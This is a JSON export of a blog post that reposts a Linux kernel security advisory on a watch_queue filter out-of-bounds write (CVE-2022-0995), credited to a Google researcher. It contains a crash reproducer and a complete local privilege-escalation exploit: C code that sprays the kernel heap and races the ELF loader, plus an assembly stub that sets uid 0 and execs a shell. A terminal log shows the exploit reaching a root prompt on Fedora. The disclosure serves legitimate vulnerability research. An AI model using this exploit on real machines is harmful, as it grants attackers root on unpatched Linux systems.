{"id":23378,"date":"2022-04-19T19:29:54","date_gmt":"2022-04-19T15:29:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166770\/GS20220419150504.txt"},"modified":"2022-05-09T07:52:10","modified_gmt":"2022-05-09T03:22:10","slug":"linux-watch_queue-filter-out-of-bounds-write","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/linux-watch_queue-filter-out-of-bounds-write\/","title":{"rendered":"Linux watch_queue Filter Out-Of-Bounds Write"},"content":{"rendered":"<p dir=\"ltr\">Linux: watch_queue filter OOB write (and other bugs)<\/p>\n<p dir=\"ltr\">This bug report is about things in the watch_queue subsystem,<br \/>\nwhich is only enabled under CONFIG_WATCH_QUEUE. That seems to be<br \/>\ndisabled e.g. on Debian, but Ubuntu and Fedora enable it.<\/p>\n<p dir=\"ltr\">The watch_queue subsystem has a bug that leads to out-of-bounds<br \/>\nwrite in watch_queue_set_filter():<br \/>\nThe first loop correctly checks for<\/p>\n<p dir=\"ltr\">if (tf[i].type &gt;= sizeof(wfilter-&gt;type_filter) * 8)<\/p>\n<p dir=\"ltr\">but the second loop has the bound for .type wrong by a factor of 8<br \/>\n(on 64-bit systems):<\/p>\n<p dir=\"ltr\">if (tf[i].type &gt;= sizeof(wfilter-&gt;type_filter) * BITS_PER_LONG)<\/p>\n<p dir=\"ltr\">This leads to two out-of-bounds writes:<\/p>\n<p dir=\"ltr\">1. out-of-bounds __set_bit() on wfilter-&gt;type_filter<br \/>\n2. 
out-of-bounds write of array elements past the end of wfilter-&gt;filters<\/p>\n<p dir=\"ltr\">The following reproducer triggers a KASAN splat:<br \/>\n&#8220;`<br \/>\n#define _GNU_SOURCE<br \/>\n#include &lt;unistd.h&gt;<br \/>\n#include &lt;err.h&gt;<br \/>\n#include &lt;stdio.h&gt;<br \/>\n#include &lt;stdlib.h&gt;<br \/>\n#include &lt;sys\/ioctl.h&gt;<br \/>\n#include &lt;sys\/syscall.h&gt;<br \/>\n#include &lt;linux\/watch_queue.h&gt;<\/p>\n<p dir=\"ltr\">int main(void) {<br \/>\nint pipefds[2];<br \/>\nif (pipe2(pipefds, O_NOTIFICATION_PIPE))<br \/>\nerr(1, &quot;pipe2&quot;);<br \/>\nint pfd = pipefds[0];<\/p>\n<p dir=\"ltr\">struct watch_notification_filter *filter =<br \/>\nmalloc(sizeof(struct watch_notification_filter) +<br \/>\nsizeof(struct watch_notification_type_filter));<br \/>\nfilter-&gt;nr_filters = 1;<br \/>\nfilter-&gt;__reserved = 0;<br \/>\nfilter-&gt;filters[0] = (struct watch_notification_type_filter){ .type = 1023 };<br \/>\nif (ioctl(pfd, IOC_WATCH_QUEUE_SET_FILTER, filter))<br \/>\nerr(1, &quot;SET_FILTER&quot;);<br \/>\n}<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">Here&#8217;s the splat:<br \/>\n&#8220;`<br \/>\n[ 83.180406][ T611] ==================================================================<br \/>\n[ 83.181694][ T611] BUG: KASAN: slab-out-of-bounds in watch_queue_set_filter+0x659\/0x740<br \/>\n[ 83.182928][ T611] Write of size 4 at addr ffff88800d2c66bc by task watch_queue_oob\/611<br \/>\n[&#8230;]\n[ 83.187234][ T611] Call Trace:<br \/>\n[ 83.187712][ T611] &lt;TASK&gt;<br \/>\n[ 83.188133][ T611] dump_stack_lvl+0x45\/0x59<br \/>\n[ 83.188796][ T611] print_address_description.constprop.0+0x1f\/0x150<br \/>\n[&#8230;]\n[ 83.190539][ T611] kasan_report.cold+0x7f\/0x11b<br \/>\n[&#8230;]\n[ 83.192236][ T611] watch_queue_set_filter+0x659\/0x740<br \/>\n[&#8230;]\n[ 83.194563][ T611] __x64_sys_ioctl+0x127\/0x190<br \/>\n[ 83.195297][ T611] do_syscall_64+0x43\/0x90<br \/>\n[ 83.195941][ T611] 
entry_SYSCALL_64_after_hwframe+0x44\/0xae<br \/>\n[&#8230;]\n[ 83.208194][ T611] Allocated by task 611:<br \/>\n[ 83.208807][ T611] kasan_save_stack+0x1e\/0x40<br \/>\n[ 83.209479][ T611] __kasan_kmalloc+0x81\/0xa0<br \/>\n[ 83.210258][ T611] watch_queue_set_filter+0x23a\/0x740<br \/>\n[ 83.211027][ T611] __x64_sys_ioctl+0x127\/0x190<br \/>\n[ 83.211708][ T611] do_syscall_64+0x43\/0x90<br \/>\n[ 83.212341][ T611] entry_SYSCALL_64_after_hwframe+0x44\/0xae<br \/>\n[ 83.213177][ T611]\n[ 83.213510][ T611] The buggy address belongs to the object at ffff88800d2c66a0<br \/>\n[ 83.213510][ T611] which belongs to the cache kmalloc-32 of size 32<br \/>\n[ 83.215452][ T611] The buggy address is located 28 bytes inside of<br \/>\n[ 83.215452][ T611] 32-byte region [ffff88800d2c66a0, ffff88800d2c66c0)<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">In case you&#8217;re wondering why syzkaller never managed to hit this:<br \/>\nIt actually has a definition file for watch queue stuff<br \/>\n(https:\/\/github.com\/google\/syzkaller\/blob\/master\/sys\/linux\/dev_watch_queue.txt),<br \/>\nbut that seems to be based on an older version of the series that introduced<br \/>\nwatch queues, so syzkaller doesn&#8217;t know about O_NOTIFICATION_PIPE and instead<br \/>\ntries to open \/dev\/watch_queue.<\/p>\n<p dir=\"ltr\">Here&#8217;s an extremely shoddy exploit that will sometimes give you a root shell<br \/>\non Fedora 35 and sometimes instead make the system hang\/panic:<br \/>\n&#8220;`<br \/>\n[user@fedora watch_queue]$ cat watch_queue_oob_elf_phdr.c<br \/>\n#define _GNU_SOURCE<br \/>\n#include &lt;unistd.h&gt;<br \/>\n#include &lt;err.h&gt;<br \/>\n#include &lt;stdio.h&gt;<br \/>\n#include &lt;stddef.h&gt;<br \/>\n#include &lt;sched.h&gt;<br \/>\n\/\/header conflict :\/<br \/>\n\/\/#include &lt;fcntl.h&gt;<br \/>\nint open(const char *pathname, int flags, ...);<br \/>\n#include &lt;stdlib.h&gt;<br \/>\n#include &lt;sys\/ioctl.h&gt;<br \/>\n#include &lt;sys\/inotify.h&gt;<br 
\/>\n#include &lt;sys\/eventfd.h&gt;<br \/>\n#include &lt;sys\/resource.h&gt;<br \/>\n#include &lt;sys\/xattr.h&gt;<br \/>\n#include &lt;sys\/wait.h&gt;<br \/>\n#include &lt;sys\/mount.h&gt;<br \/>\n#include &lt;sys\/syscall.h&gt;<br \/>\n#include &lt;linux\/watch_queue.h&gt;<br \/>\n#include &lt;linux\/elf.h&gt;<\/p>\n<p dir=\"ltr\">#define SYSCHK(x) ({ \\<br \/>\ntypeof(x) __res = (x); \\<br \/>\nif (__res == (typeof(x))-1) \\<br \/>\nerr(1, &quot;SYSCHK(&quot; #x &quot;)&quot;); \\<br \/>\n__res; \\<br \/>\n})<\/p>\n<p dir=\"ltr\">int main(void) {<br \/>\nstruct rlimit rlim_nofile;<br \/>\nSYSCHK(getrlimit(RLIMIT_NOFILE, &amp;rlim_nofile));<br \/>\nrlim_nofile.rlim_cur = rlim_nofile.rlim_max;<br \/>\nSYSCHK(setrlimit(RLIMIT_NOFILE, &amp;rlim_nofile));<\/p>\n<p dir=\"ltr\">\/\/ pin to one CPU core<br \/>\ncpu_set_t cpu_set;<br \/>\nCPU_ZERO(&amp;cpu_set);<br \/>\nCPU_SET(0, &amp;cpu_set);<br \/>\nSYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &amp;cpu_set));<\/p>\n<p dir=\"ltr\">\/\/ create notification pipes, without filters yet<br \/>\nint pfds[128];<br \/>\nfor (int i=0; i&lt;128; i++) {<br \/>\nint pipefds[2];<br \/>\nSYSCHK(pipe2(pipefds, O_NOTIFICATION_PIPE));<br \/>\npfds[i] = pipefds[0];<br \/>\nclose(pipefds[1]);<br \/>\n}<\/p>\n<p dir=\"ltr\">\/\/ create a child with SCHED_IDLE policy that runs execve() when told to<br \/>\nint continue_eventfd = SYSCHK(eventfd(0, 0));<br \/>\npid_t child = SYSCHK(fork());<br \/>\nif (child == 0) {<br \/>\nstruct sched_param param = { .sched_priority = 0 };<br \/>\nSYSCHK(sched_setscheduler(0, SCHED_IDLE, &amp;param));<\/p>\n<p dir=\"ltr\">eventfd_t evfd_value;<br \/>\nSYSCHK(eventfd_read(continue_eventfd, &amp;evfd_value));<\/p>\n<p dir=\"ltr\">SYSCHK(execl(&quot;\/usr\/bin\/newgrp&quot;, &quot;newgrp&quot;, &quot;--bogus&quot;, &quot;\/bin\/bash&quot;, NULL));<br \/>\n}<\/p>\n<p dir=\"ltr\">\/\/ set up an inotify watch to notify us every time the ELF parser reads 
from<br \/>\n\/\/ the ELF binary (which involves preempting the ELF parser).<br \/>\nint infd = SYSCHK(inotify_init());<br \/>\nSYSCHK(inotify_add_watch(infd, &quot;\/usr\/bin\/newgrp&quot;, IN_ACCESS));<\/p>\n<p dir=\"ltr\">\/\/ spam kmalloc-32 a bit. note that this might not be enough spam, depending<br \/>\n\/\/ on how fragmented the slab is...<br \/>\n\/\/ after spamming the slab, free all our allocations again, so that hopefully<br \/>\n\/\/ we end up with a (more or less) empty CPU slab.<br \/>\n#define NUM_SPAM 10000 \/* 900 *\/<br \/>\nSYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));<br \/>\nSYSCHK(mount(&quot;none&quot;, &quot;\/dev\/shm&quot;, &quot;tmpfs&quot;, MS_NOSUID|MS_NODEV, &quot;&quot;));<br \/>\nint tmpfile = SYSCHK(open(&quot;\/dev\/shm\/&quot;, O_TMPFILE|O_RDWR, 0666));<br \/>\nfor (int i=0; i&lt;NUM_SPAM; i++) {<br \/>\nchar name[14] = &quot;security.XXXX&quot;;<br \/>\nname[ 9] = &#39;A&#39; + ((i &gt;&gt; 0) % 16);<br \/>\nname[10] = &#39;A&#39; + ((i &gt;&gt; 4) % 16);<br \/>\nname[11] = &#39;A&#39; + ((i &gt;&gt; 8) % 16);<br \/>\nname[12] = &#39;A&#39; + ((i &gt;&gt; 12) % 16);<br \/>\nSYSCHK(fsetxattr(tmpfile, name, &quot;&quot;, 0, XATTR_CREATE));<br \/>\n}<br \/>\nclose(tmpfile);<\/p>\n<p dir=\"ltr\">\/\/ launch the ELF parser and preempt at every read.<br \/>\n\/\/ note that PREEMPT_VOLUNTARY means we actually don&#39;t get rescheduled<br \/>\n\/\/ directly at kernel_read(), instead it happens on the next kmalloc():<br \/>\n\/\/ __kmalloc() -&gt; slab_alloc() -&gt; slab_alloc_node() -&gt; slab_pre_alloc_hook()<br \/>\n\/\/ -&gt; might_alloc() -&gt; might_sleep_if() -&gt; might_sleep() -&gt; might_resched()<br \/>\n\/\/ -&gt; __cond_resched()<br \/>\n\/\/<br \/>\n\/\/ First preemption is the allocation of memory for program headers,<br \/>\n\/\/ second preemption is the allocation of memory for the interpreter name.<br \/>\n\/\/ At the second preemption, the program 
headers have been loaded into<br \/>\n\/\/ memory but the interpreter name&#39;s offset hasn&#39;t been read yet.<br \/>\n\/\/ Third preemption is after the interpreter name has been stored in the<br \/>\n\/\/ allocation but before it is passed to the VFS for opening.<br \/>\nSYSCHK(eventfd_write(continue_eventfd, 1));<br \/>\nfor (int i=0; i&lt;3; i++) {<br \/>\nstruct inotify_event inev;<br \/>\nif (SYSCHK(read(infd, &amp;inev, sizeof(inev))) != sizeof(inev))<br \/>\nerrx(1, &quot;bad inotify_event size&quot;);<br \/>\n}<\/p>\n<p dir=\"ltr\">struct watch_notification_filter *filter =<br \/>\nmalloc(sizeof(struct watch_notification_filter) +<br \/>\n2 * sizeof(struct watch_notification_type_filter));<br \/>\nfilter-&gt;nr_filters = 1;<br \/>\nfilter-&gt;__reserved = 0;<br \/>\nfilter-&gt;filters[0] = (struct watch_notification_type_filter){<br \/>\n.type = 20 * 8,<br \/>\n.info_mask = 0x80<br \/>\n};<br \/>\nfor (int i=0; i&lt;127; i++) {<br \/>\nSYSCHK(ioctl(pfds[i], IOC_WATCH_QUEUE_SET_FILTER, filter));<br \/>\n}<\/p>\n<p dir=\"ltr\">int status;<br \/>\nint wait_res = wait(&amp;status);<br \/>\nprintf(&quot;wait_res = %d\\n&quot;, wait_res);<br \/>\nif (WIFEXITED(status)) {<br \/>\nprintf(&quot;exited with status %d\\n&quot;, WEXITSTATUS(status));<br \/>\n} else if (WIFSIGNALED(status)) {<br \/>\nprintf(&quot;signaled with signal %d\\n&quot;, WTERMSIG(status));<br \/>\n} else {<br \/>\nprintf(&quot;other?\\n&quot;);<br \/>\n}<br \/>\n}<br \/>\n[user@fedora watch_queue]$ gcc -o watch_queue_oob_elf_phdr watch_queue_oob_elf_phdr.c<br \/>\n[user@fedora watch_queue]$ cat bogus-loader.S<br \/>\n.global _start<br \/>\n_start:<br \/>\n\/* setresuid(0, 0, 0) *\/<br \/>\nmov $117, %eax<br \/>\nmov $0, %rdi<br \/>\nmov $0, %rsi<br \/>\nmov $0, %rdx<br \/>\nsyscall<\/p>\n<p dir=\"ltr\">\/* execve(argv[2], argv+2, envv) *\/<br \/>\nmov $59, %eax<br \/>\nmov 24(%rsp), %rdi<br \/>\nlea 24(%rsp), %rsi<br \/>\nlea 
40(%rsp), %rdx \/* assume argc==3 *\/<br \/>\nsyscall<br \/>\nint $3<br \/>\n[user@fedora watch_queue]$ as -o bogus-loader.o bogus-loader.S<br \/>\n[user@fedora watch_queue]$ ld -shared -o $&#39;\\x80&#39; bogus-loader.o<br \/>\n[user@fedora watch_queue]$ .\/watch_queue_oob_elf_phdr<br \/>\n[root@fedora watch_queue]# id<br \/>\nuid=0(root) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">There are also some other bugs in the subsystem, but those are less<br \/>\neasy to exploit or not security bugs at all:<\/p>\n<p dir=\"ltr\">1. free_pipe_info() first calls put_watch_queue(), which RCU-frees the<br \/>\nstruct watch_queue. Then afterwards it calls pipe_buf_release() on the<br \/>\npipe buffers, which calls watch_queue_pipe_buf_release(), which calls<br \/>\nset_bit() on the already RCU-freed watch_queue. This is at least<br \/>\ntheoretically a UAF, in particular under CONFIG_PREEMPT.<\/p>\n<p dir=\"ltr\">2. watch_queue_pipe_buf_ops has a .get handler that calls<br \/>\ntry_get_page() and a .release handler that doesn&#8217;t touch the page count.<br \/>\nThis would be a bug, except that this is dead code because none of the<br \/>\nsplice stuff works on notification pipes.<\/p>\n<p dir=\"ltr\">3. From what I can tell, watch_queue_set_size() permits setting a<br \/>\nnon-power-of-two number of buffers, which will break the code that<br \/>\nassumes that you can use bitmasks instead of modulo for indexing into<br \/>\nthe pipe buffers array.<\/p>\n<p dir=\"ltr\">4. watch_queue_set_size() sets wqueue-&gt;nr_notes to nr_notes rounded up<br \/>\nto a multiple of WATCH_QUEUE_NOTES_PER_PAGE while allocating the<br \/>\n-&gt;notes_bitmap with size nr_notes bits rounded up to a multiple of<br \/>\nBITS_PER_LONG. On architectures with big PAGE_SIZE, this could lead to<br \/>\nwqueue-&gt;nr_notes being bigger than the bitmap.<\/p>\n<p dir=\"ltr\">5. 
wqueue-&gt;notes_bitmap is never freed.<\/p>\n<p dir=\"ltr\">6. There is no synchronization between post_one_notification() and<br \/>\npipe_read(), neither locking nor smp_store_release().<\/p>\n<p dir=\"ltr\">7. watch_queue_clear() has a comment claiming that -&gt;defunct prevents<br \/>\nnew additions and notifications, but actually it only prevents<br \/>\nnotifications, not additions.<\/p>\n<p dir=\"ltr\">This bug is subject to a 90-day disclosure deadline. If a fix for this<br \/>\nissue is made available to users before the end of the 90-day deadline,<br \/>\nthis bug report will become public 30 days after the fix was made<br \/>\navailable. Otherwise, this bug report will become public at the deadline.<br \/>\nThe scheduled deadline is 2022-06-08.<\/p>\n<p dir=\"ltr\">Related CVE Numbers: CVE-2022-0995.<\/p>\n<p dir=\"ltr\">Found by: jannh@google.com<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linux: watch_queue filter OOB write (and other bugs) This bug report is about things in the watch_queue subsystem, which is only enabled under CONFIG_WATCH_QUEUE. That seems to be disabled e.g. on Debian, but Ubuntu and Fedora enable it. 
The watch_queue subsystem has a bug that leads to out-of-bounds write in watch_queue_set_filter(): The first loop correctly &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-23378","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23378","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=23378"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23378\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=23378"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=23378"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=23378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}